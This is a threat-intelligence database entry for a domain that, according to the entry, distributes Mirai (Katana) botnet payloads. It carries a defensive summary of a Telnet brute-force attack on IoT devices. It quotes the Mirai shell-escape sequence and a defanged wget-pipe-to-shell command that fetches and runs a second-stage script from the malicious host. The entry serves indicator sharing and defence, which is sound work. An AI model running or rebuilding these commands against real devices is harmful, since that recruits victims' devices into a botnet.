ThreatFox IOC Database
You are viewing the ThreatFox database entry for domain bins.oceanic-node.su.
Database Entry
| Field | Value |
|---|---|
| IOC ID: | 1838471 |
| IOC: | bins.oceanic-node.su |
| IOC Type: | domain |
| Threat Type: | payload_delivery |
| Malware: | Mirai |
| Malware alias: | Katana |
| Confidence Level: | Confidence level is elevated (75%) |
| Is compromised?: | False |
| First seen: | 2026-06-27 06:24:37 UTC |
| Last seen: | never |
| UUID: | 7c6b3d6e-71b4-11f1-97fa-42010aa4000a |
| Reporter: | |
| Reward: | 5 credits from ThreatFox |
| Tags: | IoT Mirai telnet |
| Reference: | https://speculus.co/search?ip=59.126.16.66 |
Speculus
Activity Timestamp: 2026-06-26T22:57:24Z
Summary: Following a Telnet brute-force login against an exposed IoT/DVR-class device on tcp/23, the actor ran the standard Mirai CPE shell-escape sequence (shell/enable/system/linuxshell/ping;sh) and the BusyBox applet fingerprint '/bin/busybox FASTCAT', then attempted to download and execute a second-stage shell script from a single distribution host via three fallback methods (HTTP wget, TFTP, FTP). Activity is consistent with Mirai (alias Katana) IoT botnet recruitment.
Heuristic Detection:
* Target Vector: T1110.001 (Brute Force: Password Guessing) / T1059.004 (Unix Shell) / T1105 (Ingress Tool Transfer)
* IP Address: 59[.]126[.]16[.]66 (infected bot, source)
* Target Port: 23 (Telnet/TCP)
* Execution Footprint: `/bin/busybox wget hxxp://bins[.]oceanic-node[.]su/wget.sh -O- | sh`
* Distribution Host: bins[.]oceanic-node[.]su (also TFTP tftp.sh, FTP ftpget.sh)
Reference: https://speculus.co/search?ip=59.126.16.66